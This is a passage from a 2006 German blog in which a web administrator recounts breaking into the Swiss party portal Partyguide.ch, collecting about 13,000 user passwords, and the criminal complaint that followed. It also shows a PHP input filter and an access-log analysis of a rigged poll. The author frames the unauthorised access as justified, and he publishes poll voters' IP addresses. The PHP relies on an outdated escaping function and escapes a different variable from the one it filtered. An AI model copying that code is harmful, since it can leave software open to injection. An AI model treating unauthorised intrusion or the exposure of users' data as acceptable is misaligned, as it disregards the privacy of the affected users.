Wenn man ernstgenommen werden möchte, sollte man solche Aktionen in Zukunft lieber unterlassen. Hat Partyguide solche Sauereien wirklich nötig?
Labels: Partyguide
Samstag, August 26, 2006
Tabellenlayout adé! (Und: XSS vorbeugen)
(Ich hoffe, dass die Entwickler von Partyguide.ch mitlesen ...)
Gestern habe ich mich daran gemacht, die Web-Site meines Arbeitgebers zu überarbeiten.
Tables are so 2003!
Zuerst nahm ich mich dem Layout an. Dieses hatte ich zu Beginn des Jahres 2003 entwickelt - einer Zeit, als Tabellenlayouts noch State-Of-The-Art waren (jedenfalls in meinem Kopf) und ich CSS gerade erst zu entdecken begann, um damit ... Texte zu formatieren.
Dass man mit den Cascading Stylesheets noch viel mehr anstellen konnte, verschloss sich mir damals noch.
Viel hat sich in der Zwischenzeit getan und heute möchte ich die Funktionalität von CSS2 nicht mehr missen. Die Templates für Web-Sites lassen sich rascher und mit viel weniger Overhead erstellen und auch nachträglich ohne Eingriff in den Code abändern. Zudem sind sie behindertengerechter.
Leider, leider, hat sich der 500-Pfund-Gorilla aus Redmond bei der CSS-Implementation in den sichersten Browser der Welt (just kidding) nicht viel Mühe gegeben, weshalb man immer überprüfen muss, ob auch der MSIE auch wirklich alles korrekt anzeigt, wie es seine standardkonformeren Kollegen Firefox, Safari und Opera anstandslos tun.
Erst dank CSS habe ich gelernt, ganz normale HTML-Tags wie h1 und p zu lieben. Zu nothing-Zeiten benutzte ich beispielsweise nicht etwa h1, um Überschriften festzulegen, sondern etwas in der Form
<span class="contentTitleFirstLevel">Title</span>
Es gibt Leute, die Spass daran haben, das Rad immer wieder neu zu erfinden. Auch ich gehörte dazu. Abgebucht unter: Jugendsünde. Denn er wusste nicht, was er tat ...
XSS vorbeugen
Neben der Verschlankung des Designs (die Grösse des Templates konnte in etwa halbiert werden!) liess ich natürlich auch eine Web 2.0-Komponente in das Design einfliessen: Eine interaktive Personensuche.
Aus den Fehlern von Partyguide schlau, legte ich besonderes Augenmerk auf XSS-Sicherheitslücken. Für Aussenstehende: XSS bedeutet das "Einschleusen" von Code auf eine Web-Site. Je nach Art der Web-Site lassen sich so mehr oder weniger grosse Dummheiten anstellen. Bei Partyguide hatte man bei der Attacke beispielsweise Zugriff auf die Cookies des Benutzers, in denen das (glücklicherweise nach meiner Intervention) verschlüsselte Passwort abgelegt war.
Damit bei meiner Personensuche nicht ungewollt Code eingeschleust werden kann, der sich für eine XSS-Attacke missbrauchen liess, baute ich eine (hoffentlich recht zuverlässige) Sicherung ein:
1 ...
2 if(!isset($_GET['string'])) {
3 $str_output .= '<p>Fehler: Formular nur teilweise übermittelt.</p>';
4 die($str_output);
5 }
6
7 $str_lookup_string = $_GET["string"];
8 $str_lookup_string = preg_replace("/[^a-zA-ZäöüÄÖÜ]/",NULL,$str_lookup_string);
9
10 if(strlen($str_lookup_string) < 3) {
11 $str_output .= '<p>Hinweis: Mind. 3 Zeichen eingeben.</p>';
12 die($str_output);
13 }
14 ...
15 $str_atom = $str_field . " LIKE '%" . mysql_escape_string($str_search_string) . "%'";
16 ...
Hier kurz einige erläuternde Erklärungen:
- Zeile 2: Wurde die GET-Variable gar nicht erst übermittelt, ist etwas faul - Abbruch (Zeile 4). Ich beharre zudem auch darauf, dass eine GET-Variable hereinkommt und nicht POST oder sonstwas (Verwendung des GET-Arrays, nicht des REQUEST-Arrays)
- Zeile 8: Da es sich um eine Personensuche handelt, haben Sonderzeichen nichts in der Anfrage verloren. Ich filtere diese mit PCRE aus. Und zwar so, dass ich festlege, was erlaubt ist und der Rest gelöscht wird - und nicht umgekehrt, dass ich festlege, was nicht erlaubt ist, und blöderweise doch noch etwas wichtiges vergesse, das durch den Check dann hindurchkommt. Wichtig ist hier insbesondere, dass die Markierer von HTML-Tags, > (grösser als) und < (kleiner als) weggefegt werden.
- Zeile 10: Was beim Web-Shop von Digitec nervt, erscheint hier sinnvoll: Niemand wird wohl mit nur einem bestimmten Buchstaben (z.B. 'e') nach Personen suchen. Deshalb verbieten wir zu kurze Suchanfragen lieber auch gleich (bei Digitec wiederum wäre es manchmal sinnvoll, wenn ich auch nur nach zwei Zeichen suchen könnte, weil technische Geräte nun mal oft so benannt sind).
- Zeile 15: Obwohl der Such-String mittlerweile "clean" sein sollte, gehe ich auf Nummer sicher, wenn ich ihn der Datenbank übergebe - und lasse mysql_escape_string drüberlaufen.
Labels: Partyguide
Montag, August 21, 2006
Zurück
Danke für all' die Anfragen, die ich im Laufe dieser Woche erhalten habe. Ich darf meine Leser beruhigen: Weder bin ich mittlerweile Insasse einer geschlossenen Strafanstalt, noch wurde ich von Partyguide-Photographen zu Tode geblitzt.
Viel einfacher: Ferien! Ich war vom Samstag, 12. August 2006, bis Samstag, 19. August 2006, an der (azur)blauen Küste und habe dort mit Kollegen die Gegend um Nizza und St. Raphael unsicher gemacht. Wir haben sogar eine Sicherheitslücke entdeckt (und ausgenutzt), doch dazu später mehr.
Nun bin ich wohlbehalten zurück und werde es in den nächsten Tagen hoffentlich fertig bringen, ein Artikel "Ausgehen in Nizza" (analog zu Ausgehen in Zürich - von Bernern für Berner, Ausgehen in Madrid - von Schweizern für Schweizer und Erste Osternacht in Kopenhagen) zu verfassen.
Notabene: Da ist man gerade mal sieben Tage weg, und schon spriesst ein neues Blog-Pflänzlein aus dem verregneten Boden. Torquie, herein, Willkommen im Verein!
Labels: Partyguide
Donnerstag, August 10, 2006
Heute in "heute" ...
Wegen angeblichem "Hack" auf Partyguide.ch
Strafanzeige gegen Blogger
NEUENEGG BE. Der Berner Mario Aeby (25) bloggte über Sicherheitslücken bei Partyguide.ch. Nun reichten die Macher Strafanzeige ein und verpetzten ihn beim Chef.
[...]
Quelle: Strafanzeige gegen Blogger
Endlich ...
... erfahren Benutzer von Partyguide auf breiter Basis über die Unsicherheit des Community-Portals. Ich bin mir sicher, dass dieser zusätzliche Druck förderlich für die Sicherheit des Portals sein wird. Und vielleicht sogar den einen oder anderen Nutzer sensibilisiert, grundsätzlich vorsichtiger mit Passwörtern und persönlichen Daten im Internet zu hantieren.
In den Partyguide-Foren wird bereits Rege diskutiert. Löblich. (Dank: Torquie)
Jason vs. Mario
Jetzt gerade erreicht mich noch der Hinweis auf die Stellungnahme Jason Fellmanns auf den 'heute'-Artikel.
Lustiges Bildli - der Zeitung kann man garantiert nicht vorwerfen, dass zu wenig personalisiert wird *grins*.
Ich betone ein weiteres Mal: Ich habe die Zugangsdaten erst veröffentlicht, als die Passwörter bereits vom Betreiber geändert worden waren (wie sonst könnte ich das E-Mail abdrucken, dass einem kompromittierten User zugesandt wurde?!)
Mir ist zudem immer noch unverständlich, wieso Benutzer mit unsicheren Passwörtern dieses nicht beim nächsten Login zwingend wechseln mussten?
Aber eben ... In unserem nächsten Leben ist zwischen mir und Jason alles vergessen und wir gehen einen Saufen. Versprochen. Vielleicht programmieren wir dann ja sogar zusammen eine Party-Web-Site? (Dank: Torquie)
Nocheinmal genau so?
Jein.
Ich weiss zwar jetzt, ...
- ... dass in der Schweiz jeder jeden anzeigen kann,
- ... wie eine Befragung bei der Polizei abläuft,
- ... wie eine Hausdurchsuchung vonstatten geht (der Server darf nicht ordnungsgemäss heruntergefahren werden, sondern der Stromstecker muss im laufenden Betrieb gezogen werden),
- ... dass 808GB Festplattendaten beim Freund und Helfer in Bern nun quasi als Backup gelagert werden und auf die Beweissicherung warten,
- ... dass die Hardware dank meinem Kooperationswillen mit dem Hüter von Gesetz und Ordnung bereits nach knapp einer Woche anstelle nach drei bis vier Monaten wieder freigegeben wurde,
- ... dass die Blogosphäre zur Angelegenheit nicht geschwiegen hat und Solidarität, aber auch Kritik ausgeteilt hat, die ich zu Herzen nehmen werde
- ... ich nicht zuletzt bei meinen Kollegen für Unterhaltung ("du siech wirsch so öppis vo iglochet, aeby!") gesorgt habe,
- ... ich von unzähligen Tipps und gutgemeinten Ratschlägen förmlich erschlagen wurde (u.a. Gegenklage, Anzeige wegen Ehrverletzung, Anwalt nehmen),
- ... ich unbedingt eine Rechtschutzversicherung abschliessen muss,
- ... dass mein Umgang mit telefonischen Anfragen von Seiten der Medien verbessert werden konnte,
- ... dass der Hack erst so richtig an Nachrichtenwert gewann (und die nötige Reizschwelle überschritt), als Strafanzeige gegen mich erlassen wurde und Partyguide danach (nachdoppelnd?) zur Feder griff,
Dennoch: Alles in allem hinterlässt die ganze Sache einen zwiespältigen Eindruck. Nahe legen kann ich solche Aktionen niemandem.
Labels: Neuenegg, Partyguide
Mittwoch, August 09, 2006
Partyguide heuert Sicherheits-Experten an
Yannick von Arx arbeitet für Swisscom AG in der Schweiz. In seiner Freizeit arbeitet er für PartyGuide GmbH als IT-Security Consultant.
Quelle: www.partyguide.ch (XSS) Cross Site Scripting Vulnerability
Ich wünsche Yannick beim Durchforsten von hunderten amateurhaft programmierten PHP-Files viel Ausdauer und Mut. Häb düre, Münggu!
Dank: Torquie (für den Adlerblick)
Labels: Partyguide, Wirtschaft
Montag, August 07, 2006
Partyguide schreibt meinem Arbeitgeber einen Brief
Partyguide greift zur Feder
In der Ägäis muss wohl lange Zeit Windstille geherrscht haben, was Jason und die Partyguide-Argonauten dazu trieb, zur Feder zu greifen und ein literarisches Epos zu verfassen. Ziel: Ihre Heldentaten in aller Welt bekannt zu machen und sich bis in alle Ewigkeit in den Köpfen der Menschheit zu verewigen ... Nun gut, ich helfe, wo ich kann! An mir soll's nicht scheitern.
Die Beweggründe hinter dem Brief
Der Brief erzählt die Geschichte des (gemäss WEMF-Statistik) meistbesuchten schweizerischen Partyportales, welches es mit dem Datenschutz nicht so ernst nimmt. Durch amateurhafte und schludrige Programmierung waren wiederholt persönliche Daten seiner Nutzer gefährdet:
Beim ersten Hack waren alle damals ca. 200'000 Accounts betroffen (man konnte sich dank eines Cookie-Exploits in jedes beliebiges Konto einloggen, sofern man selber Benutzer der Site war), beim zweiten Hack konnten über ein Suchformular Passwörter von Benutzern ausfindig gemacht werden (Stichwort: SQL-Injection). Gab man ein bestimmtes Passwort in ein Formularfeld ein, lieferte die Suchfunktion der Web-Site alle Benutzer zurück, die dieses Passwort verwendeten. Hierzu war kein eigener Account auf dem Portal nötig - jedermann konnte mit minimen Kenntnissen von HTML die Suchanfrage um das Passwort-Feld erweitern. 13'000 Passwörtern fielen mir so innerhalb einer Woche in die Hände.
Datenschutz bei Partyguide - eine Farce?
Anstelle die Benutzer des Portals über die Sicherheitslöcher zu informieren (bis heute hat Partyguide nicht offiziell und direkt an seine Kunden gerichtet Stellung bezogen) und den gesamten Spaghetti-Code einem Sicherheits-Audit zu unterziehen, tat man dies, was man von Dilettanten nicht anderes erwarten konnte: Man köpfte den Überbringer der schlechten Nachricht und hoffte so, den sich aufdrängenden Fragen zu entkommen ... Liebe Betreiber: Sicherheitslöcher löst man nicht, in dem man alle Hacker dieser Welt an die Wand stellt und erschiesst.
Adressaten des Briefes
Der Brief, der letzte Woche verschickt wurde, ging an meinen Arbeitgeber, die Universität Bern. Dort arbeite ich am Departement Klinische Forschung als "IT-Verantwortlicher" (sorry, so lautet die Bezeichnung nun mal) und am Historischen Institut als Webmaster.
Ich möchte betonen: Die oben genannte Aufdeckung von Sicherheitslöchern wurden ausschliesslich von meinem Server zu Hause an der Stritenstrasse aus über einen Internetzugang von Cablecom Hispeed durchgeführt. Zu keiner Zeit habe ich dazu die Infrastruktur meines Arbeitgebers herangezogen. Für mich ist es deshalb etwas unverständlich, wieso mein Arbeitgeber über das Tun in meiner Freizeit informiert wird. Aber eben - bei Partyguide sollte mich eigentlich nichts mehr verwundern.
Der Inhalt des Briefes
Scan (PDF, 200kB)
Ich überlasse es der Blogosphäre selbst, sich ein Urteil über das Geschreibsel zu machen. Dieses wurde mir freundlicherweise von Kollege Liechti eingescannt und zur Verfügung gestellt.
Einige Leckerbissen (Hervorhebungen durch mich):
Der Grund dieses Schreibens an Sie ist rein informeller Natur. Es sind die höchst zweifelhaften und meines Erachtens verantwortungslosen Machenschaften eines Ihrer Mitarbeiter (evtl. Teilzeit). [...]
Wir haben lange überlegt, Sie in dieser Sache überhaupt zu kontaktieren. Da es aber Herr Aeby trotz unserer Ermahnungen vorzieht weitere Eindring- und Hackversuche auf unserem System zu starten [...] sehen wir uns gewzungen, Sie als eventuellen Arbeitgeber zu informieren.
Stellt euch vor - da weist ein Vergnügungsdampfer unzählige Löcher im Bug auf, und der Kapitän überlegt minutenlang, ob er den Matrosen, der die Löcher entdeckt hat, über Bord werfen soll. Ohne Rettungsring, versteht sich. Ich sehe die Leute hinter Partyguide förmlich, wie sehr sie mit sich gerungen haben - und doch, tjach, liess sich nichts machen. Der Brief musste raus!
Am Freitag den 09.06.2006 hat Herr Mario Aeby leider mit seinen privaten Attacken die Grenzen von Anstand und Moral bei weitem überschritten.
Grenzgänger Aeby - diesen Spruch drucke ich mir auf ein T-Shirt mit Partyguide-Logo ... Was ist mit Grenzen des Gesetzes?
Durch einen Programmierfehler in unserer Suchabfrage ist Ihm dies auch nach mehrtägigen Versuchen gelungen.
Jungs, das Scriptlein habe ich in zwei Stunden zusammengezimmert. Es funktionierte danach über sieben Tage lang zufriedenstellend (und unbemerkt). Immerhin gibt Partyguide zu, einen (?) Programmierfehler begangen zu haben.
[...] Von einem Webmaster (zumal er dies ja an einem renommierten Institut ausübt) [...]
Wow, da ist jemand genau im Bilde über das Historische Institut der Universität Bern ...
[...] geschäftsschädigende Tat [...] Wir werden alle Rechtsmittel in Erwägung ziehen [...]
Partyguide ist keine kleine Partysite
[...]
Aha. Hat da jemand Komplexe? Selbstbewusstseinsstörungen? Eben gerade darum sollten doch solche Sicherheitslücken eher bei einem kleinen, personell unterdotierten Partyportälchen eher auftauchen als bei Partyguide?!
[...] Uns ist die Sicherheit unserer User wichtig und wir werden die Sicherheitsstandards laufend anpassen und verbessern.
Ob der Futur hier absichtlich gewählt wurde?
Anstelle sinnvoller Programmiertätigkeiten und Programmverbesserungen muss sich unser Systemprogrammierer mit den Log-Files und Protokollen auseinandersetzen, um die Machenschaften des Herrn Aeby zu kontrollieren.
Ich leide mit ihm - wer im Vorfeld halt nicht sicher programmiert, muss im Nachgang mit grösserem Aufwand kämpfen.
Zudem wird die Performance des Systems zusätzlich belastet, was "normale" User mit grösseren Responsezeiten zu spüren kriegen. Der finanzielle Aufwand den wir investieren müssen ist für uns nicht mehr tragbar.
Partyguide - bald Konkurs? Her mit den Gönnerbeiträgen. Sofort.
Alle Hacker-Attacken wurden gemäss Aussage von seinem privaten PC gemacht. Es besteht keinerlei Zusammenhang zwischen der Strafanziege gegen Herrn Mario Aeby und Ihrem Institut. Wir erachten es als unsere Pflicht, Sie über die privaten Tätigkeiten Ihres Mitarbeiters zu informieren [...]
Ich stelle mir vor, wie meine Vorgesetzten den Wisch durchlesen und auf der zweiten Seite gegen Schluss endlich erfahren, dass die pöhsen, pöhsen Hackereien nichts mit dem Arbeitgeber zu tun haben. Mir wäre es lieber, würde Partyguide in anderen Bereichen pflichtbewusst auftreten. Dann würden solche Briefe auch nicht nötig werden.
Ich weiss nicht, ob sich renommierte Institute wie die Ihren einen Webmaster mit solchen Verfehlungen leisten können oder möchten [...]
... aber Jungs, jetzt wird's schon gerade ein wenig deftig, nicht? Normalerweise wird man in der Schweiz entlassen, weil die Arbeitsleistung unbefriedigend ist, und nicht, weil der Mitarbeiter in seinem Privatleben Dinge tut, die Dritten nicht genehm sind.
[...] ohne Ihre Antwort nehme ich an, dass besagter Herr nicht/nicht mehr in Ihrem Institut angestellt ist [...]
Hochachtungsvoll
Marcel Fellmann
Marketing PartyGuide.ch GmbH [...]
Marcel Fellmann - Jasons Pappi? Hmmm, mal schauen, ob mein Pappi eine Replik auf diesen Brief schreiben möchte? Zwar, nein, ich lasse es wohl bleiben. Wo ist eigentlich mein Leiter Marketing? Der könnte doch zur Feder greifen ...
Reaktionen und Kommentare von Bekannten
(Work in Progress; wird laufend ergänzt)
- Mindestens ein Empfänger hat den Brief durchgelesen und ihn danach - weggeworfen.
- "nur so näbäbii: isch scho leid, i eim Brief so viu Fallfähler ... "
- "und wenn das öpperem ir Uni mitteilt, isch das sicher nid dr Jason [...] und Co., sondern d'Behörde oder ds Gricht ..."
- "ja, u när no so ä pseudo-formelle Stil. so wie aube d'Bischpiu i dä Bewerbigsratgeber unger "so nicht!". di gliichi Information chönnt öppe uf ei Drittu Text kürzt wärde ..."
- "ig meine, ke struktur, ke ileitig, kes resume am schluss: so wime eigentlech aständigi briefe schriebt ... o süsch: wortweiderholige, 2x leider i eim satz, unlogischi sätz, u eifach konzeptlos, me fragdsech "was wot mir dä giu mit däm fötzu mitteile?""
- "zum geniessen:
nicht: 'wir haben angepasst', nicht: 'wir passen', nein: 'wir werden anpassen'. dann fangt doch an! die zukunftsform wird ja wohl nicht umsonst gewählt worden sein. sie haben ja lange darüber nachgedacht, ob sie den brief überhaupt schreiben wollen. dann haben sie auch die worte mit bedacht gewählt." - "und überhaupt: 'verbessern'.
falsche sachen werden verbessert. dann ist wohl noch immer der wurm drin. komischer marketingjunge, keine ahnung von positiver wortwahl. optimieren. immer optimieren. zu verbessern gibt es nichts bei uns. wir können nur noch optimieren." - "Wow, dr Hammer! Scho nume d Qualität gschwige denn dr Inhalt vo däm Schribe beschtätige wieder mau, was das für Amateure si..."
- "Die hei überreagiert, vo mir us gseh. Vor allem... Darfsch das? Es isch ja ersch e Azeig und no überhoupt nüt gseit?"
- "Der Brief enthält kein Datum aber der Poststempel ist vom 11. Juli 2006. Der Inhalt des Briefes sagt ungefähr, dass es verwerflich für die Uni ist, ein schlimmer Finger wie dich angestellt zu haben. Also eigentlich eine indirekte Aufforderung zur Kündigung. Ich nenne das Rufmord..."
- "Im Ernst, so einen Schmarren habe ich noch nie gehört, das sind ja nicht nur programmatisch Anfänger...."
- "Wird eh zum Bumerang für pg. Sobald wir mehr Zeit haben, geht's rund"
Manuelle Trackbacks
(Trackback - Links auf Artikel, die inhaltlich an diesen Artikel anknüpfen)
- pg adventures (Andreas Halter)
Inklusive weiteren, haarsträubenden GET-Injection - Partyguide nimmt den Datenschutz nicht ernst (Michaelsch)
- partyguide.ch hat ein Sicherheitsloch und schiesst sich ins Knie (Fredy Künzler)
- partyguide.ch: Wir erachten es als unsere Pflicht, Sie über die privaten Tätigkeiten Ihres Mitarbeiters zu informieren (Mathias Gutfeld)
- Sind die Partyguide-Fotografen bald unbeliebt? (Morphi)
- Partyguide - Rumoren in der Blogosphär (fime)
- Partyguide vs. emeidi (fime)
- Update: Partyguide nimmt den Datenschutz nicht ernst (Michaelsch)
- Emeidis Partyguide-Hack im heute (Smythe)
Labels: Partyguide
Donnerstag, Juli 27, 2006
20 Minuten kennt das Pendlerblog
Man vermutete es seit dem Tag, an dem der erste Pendlerblog-Artikel online ging (Anm. d. Red: War das wirklich der erste Pendlerblog-Artikel?) - nun ist die Katze aus dem Sack: Die Qualitätszeitung 20 Minuten gibt - indirekt zwar - zu, das Pendlerblog zu kennen.
Wer nämlich einem Link auf dem Pendlerblog folgt, der auf die Web-Site von 20 Minuten zeigt, wird schnurstracks weitergeleitet auf ...
Blogs auf Werbe-Tour: Die bestochenen Unbestechlichen
Notabene: Safari-Benutzer sind (wie immer) ein wenig bevorteilt: Öffnet man einen Link in einem neuen Tab, wird der Referer netterweise nicht mitgesendet, die Umleitung findet nicht statt.
Man kann es drehen wie man will - "ist die [Umleitung] nicht süss?" entfährt es dem Leser des Artikels, der die Machenschaften von 20 Minuten gegen das ganz, ganz, ganz pöse Pendlerblog aufdeckt. Aber 20 Minuten sei gedankt: Die hinterhältige Umleitung entspricht im Grunde ja wirklich 1:1 dem Image des Blattes. Viel Gebastel, und am Ende kommt nichts gescheites raus. Man schmückt sich sozusagen mit fremden Federn, indem man auf die Süddeutsche weiterleitet - was wohl der Herausgeber dieses wirklichen Qualitätsblattes von der Umleitung denkt?
Sowieso: Ist es nicht pure Ironie, dass gerade dasjenige Blatt, das wohl jahraus, jahrein die meisten Artikel bringt, hinter denen man Sponsoren vermutet, Bloggern vorwirft, dass sie käuflich seien? Uns also - je nach Standpunkt - in dieselbe Liga hievt oder degradiert?
Schauen wir mal, ob die Zensoren nun die halbe Schweizer Blogosphäre auf den Index nehmen ... mich eingeschlossen. Bei Partyguide habe ich es dorthin jedenfalls schon geschafft.
Labels: Partyguide
Dienstag, Juli 25, 2006
Für Jason
Tool überprüft PHP-Anwendungen auf Fehler
(Insider für alle Personen, die think eMeidi v. Partyguide bereits seit einer Weile mitverfolgen)
Wobei dieser Kommentator eben im Grunde auch Recht hat:
konsistente Programmierkonventionen (oder besser: gute, wiederverwendbare Architekturen) + Testfälle/Fixtures (die "verbotene" und "worst cases" abdecken/dokumentieren) und einen kühlen, wachen Kopf bei der Arbeit ... soll' auch helfen -- und all das "fast für umsonst".
Quelle: PHPUnit +
Doch davon ist man bei PG noch weit entfernt ...
Labels: Partyguide
Montag, Juli 24, 2006
Partyguide & Co. werden für Justiz interessant
Die Zürcher Stadtpolizei hat zwei junge Männer überführt, die sich ihr Partyleben mit Raubüberfällen finanzierten. Die Räuber wurden von zwei Opfern auf einer Party-Webseite wieder erkannt. Die Polizei hat ihnen 15 Straftaten nachweisen können.
Die Räuber im Alter von 17 und 22 Jahren verbrachten ihre Freizeit vor allem an Parties. Und das Party-Leben wurde ihnen auch zum Verhängnis. Fotografien der beiden feiernden jungen Schweizer landeten auf einer Webseite für Partygänger.
Quelle: Opfer erkennen Täter auf Party-Webseite
Kollege Ritz, der in Luzern an einer Private Fiction-Party von einem pöbelnden Polen niedergeschlagen wurde, fand das Porträt des Täters später auch auf Tilllate. Er ging aber intelligenter vor: Gleich nach der Attacke rief er die Polizei, die den Prügler noch vor Ende der Party in Gewahrsam nahm. Der Blondie kam aus Ostermundigen.
Ob der Depot-Dieb vom Gurten, der sich im Vorbeigehen u.a. flink des Tellers meines Bruders bemächtigte, um es danach mit dutzenden anderen Teller beim Depot-Stand in Bargeld umzutauschen, auch auf Party-Sites zu finden ist, ist nicht bekannt. Vielleicht durchsuchen ich und mein Bruder ja mal die unzähligen Fotos vom Gurtenfestival nach diesem Halbaffen - übrigens ebenfalls wohnhaft in Ostermundigen? Und sowas von einem Crew-Mitglied ...
Labels: Partyguide
Freitag, Juli 21, 2006
Partyguide: Die Abstimmung
Zurecht werden sich meine Leser seit Montag gefragt haben, wo denn eigentlich nun die versprochenen Resultate der Umfrage unter meinen Leser bleibt?
Klar, werden meine Kritiker sagen: Die Resultate sind niederschmetternd, deshalb veröffentlicht er sie nicht. Falsch. Oder: think eMeidi benötigt noch ein wenig Zeit, um die Resultate zu fälschen. Seine abgrundtiefe Bösheit hat er ja bei drei Partyguide-Hacks unter Beweis gestellt - wieso sollte er hier anders handeln?
Nun, um es kurz zu machen - nichts von alledem ist wahr. Hier sind die Resultate:
- Ja, such dir endlich ein richtiges Hobby! – 22
- Nein, ohne Partyguide-Hacks ist das Leben todlangweilig! – 41
Quelle: Resultate der Umfrage
Das Resultat ist nicht berauschend, aber ich hätte nicht gedacht, dass mein Tun bei der Mehrheit der Abstimmenden nicht auf unverständliches Kopfschütteln stösst, wie das Partyguide-Fanboys immer darstellen möchten.
Scripts richtig absichern
Natürlich wäre es lächerlich, derart über die Unfähigkeit der Partyguide-Programmierer herzuziehen, und dann dieselben Böcke zu schiessen wie Oberprogrammierer Jason und seine Argonauten. Ich habe deshalb die bei mir üblichen Sicherheitsstandards auch bei diesem Mini-Script angewendet. Ich schlage vor, dass Jason und seine Scripting-Slaves nun ihre Ohren spitzen und genau mitlesen. Hier steht ganz, ganz, ganz viel wichtiges, wie man sichere Web-Scripts entwickelt (gilt nicht nur für PHP - die grundlegenden Regeln gelten für alle Scriptingsprachen):
- register_globals = off. Jeder ernstzunehmende PHP-Programmierer, der persönliche Daten von Benutzern in seiner DB liegen hat, muss den entsprechenden Abschnitt im PHP-Manual gelesen haben. Wenn nicht: An die Wand mit ihm.
- POST und nichts anderes. Die Formulardaten müssen in den $_POST-Variablen daherkommen. Ist das $_POST-Array leer, bricht das Script mit die(); ab. $_REQUEST und $_GET werden nicht beachtet (auf Partyguide übrigens schon ...) Dies verhindert, dass Spassvögel wie Kollege fixnetdata (s. unten), die mit wget und GET-Variablen Amok laufen (Script-Kiddie halt), Schaden anrichten können.
- <input type="hidden"> Die Variable process des Submit-Buttons muss auch im $_POST-Array vorkommen, sonst ist etwas faul. Es wäre dann zu vermuten, dass die Abfrage nicht von einem Browser aus gesendet wurde.
- Don't trust GPC: Alles was von Clients kommt, betrachtet man per se als nicht vertrauenswürdig. Plausiblitätstest sind nötig (besonders beim dritten Partyguide-Hack mangelte es eben gerade an diesem Plausiblitätstest. Motto: "Der Client will das Feld passwort durchsuchen - dann durchsuchen wir es halt und geben es zurück. Er wird schon wissen, wieso er das will".). Ich speichere also nicht einfach $_POST['value'] direkt in die Datenbank, sondern a) wandle es mit intval(); in einen Integer-Wert um und prüfe dann, ob der Wert 0 oder 1 entspricht. Falls nicht, stirbt das Script mit die();
- Loggen, loggen, loggen: Man nimmt bei einer solchen Umfrage eben halt auch nicht einfach nur das Abstimmungsresultat entgegen. Ich loggte - sofern alle vorangegangen Tests bestanden wurden - folgende Informationen:
- Datum & Uhrzeit: Sehr wichtig, vgl. Abschnitt Falschwähler in den Resultaten
- IP-Adresse: Wer sendet die Anfrage? (beachte hierbei auch $_SERVER['X-FORWARDED-FOR'], das von einigen Proxy-Server mitgesendet wird und die tatsächliche IP-Adresse des Clients enthält. Sowohl bei proxy.unibe.ch wie auch proxy.hispeed.ch wird dieser Wert mitgesendet - von anonymen surfen als keine Spur, wenn auch kaum jemand dieses Feld mitloggt).
- User Agent: Mit welchem Browser wird abgestimmt?
Der Witzbold von fixnetdata
Keine Ahnung, wer du bist, aber du hast noch viel zu lernen:
- Zuerst stimmst du manuell 28 Mal ab.
- Danach zeigst du dein wahres Können, indem du wget bemühst und doch tatsächlich meinst, dass ich GET-Variablen akzeptiere werde.
Gerade zweitere Abstimmungsfälschung fand ich sehr amüsant und machte mich mit der Vorgehensweise anhand der access.log kundig:
ibook:~/Desktop mario$ cat access_log.2006-07-12 | grep fixnet | grep HEAD | wc -l
9562
9562 Aufrufe gab es also insgesamt von Herr ... nennen wir ihn ... fixnetdata (oder war es eine sie? dann sollten wir uns einmal kennen lernen ... *grins*).
Hier ein Beispiel:
117-183.63-81.stat.fixnetdata.ch - - [12/Jul/2006:16:10:31 +0200] "HEAD /scripts/vote.php?value=0 HTTP/1.1" 200 - "-" "curl/7.13.1 (powerpc-apple-darwin8.0) libcurl/7.13.1 OpenSSL/0.9.7i zlib/1.2.3" 117-183.63-81.stat.fixnetdata.ch - - [12/Jul/2006:16:10:31 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.13.1 (powerpc-apple-darwin8.0) libcurl/7.13.1 OpenSSL/0.9.7i zlib/1.2.3"
Erkenntnis am Rande: Ist es nicht überaus Schade, dass solche Personen auch Mac-User sind?
Und wann startete und endete die Attacke eigentlich?
cat access_log.2006-07-12 | grep fixnet | grep HEAD | cut -d " " -f 4 [12/Jul/2006:15:51:55 ... [12/Jul/2006:16:10:37
Wenn das sein Arbeitgeber wüsste ...
So, und jetzt nähme mich Wunder, was du dir dabei gedacht hast. Natürlich darfst du anonym antworten, das passt zu deinem Charakter.
Labels: Partyguide
Dienstag, Juli 11, 2006
"Lass gefälligst Partyguide in Ruhe!"
Da kriege ich doch gerade folgendes Mail rein:
auso sorry, aber du bisch ja äuä dr primitivscht depp wos git uf däre wält.
lass doch mol pg in friede!!!!
danke und gruess
karin
Quelle: Karin S. an Mario Aeby, 11. Juli 2006, 22:04 Uhr (voller Name und E-Mail-Adresse der Redaktion bekannt).
... und entschliesse mich spontan zu einer kleinen Frage-Runde:
Nachtrag
Darf ich darauf hinweisen, dass Mehrfach-Votings nicht toleriert werden - wird sind auch in der Blogosphäre eine Demokratie, sprich: One (Wo)Man, One Vote!
Bisherige Witzbolde:
| http_ip | dns | num_votes |
| 81.63.183.117 | *.stat.fixnetdata.ch | 22 |
| 138.190.15.46 | proxy.swisscom.com | 4 |
| 212.101.19.216 | static-*.adsl.solnet.ch | 4 |
| 146.67.250.181 | not found: 3(NXDOMAIN) | 3 |
Hits von Proxy-Servern (Hier: Swisscom - Torquie?) werde ich wohl nicht mitzählen können ...
Aus dem Abstimmungsstudio ...
Ich werde die Auswertungen dann online stellen, wenn kaum mehr neue Votes hinzukommen (sehr wahrscheinlich nach dem Gurtenfestival am Montag, 17. Juli 2006).
Und ja, ich garantiere Transparenz wie sie bei Partyguide für über 13'000 Passwörter auch galt.
Oh, und wer sich berufen fühlt, kann versuchen, mein Scriptlein zu hacken *smile*
Worum geht's überhaupt?
Auf think eMeidi sind bisher drei Berichte über kritische Schwachstellen der Community-Site Partyguide veröffentlicht worden, die Hackern ohne grossen Aufwand Zugang zu tausenden Benutzerkonten von Partyguide verschafften:
- Der Partyguide-Hack - Cookie-Exploit; Zugang zu jedem beliebigen Account
- Der dritte Partyguide-Hack - SQL-Injection; 13'000 Benutzeraccounts mit schwachen Passwörtern betroffen
- Der vierte Partyguide-Hack - JavaScript-Injection; Partyguide-Blog-Leser mit aktiviertem Autologin betroffen
Labels: Partyguide, Wirtschaft
Sonntag, Juli 09, 2006
Der vierte Partyguide-Hack
Wie bereits in meinem gestrigen Artikel Partyguide Strikes Back angetönt habe ich eine weitere (äusserst peinliche) Schwachstelle auf der Community-Web-Site mit der "schweizweit längsten Verweildauer" gefunden.
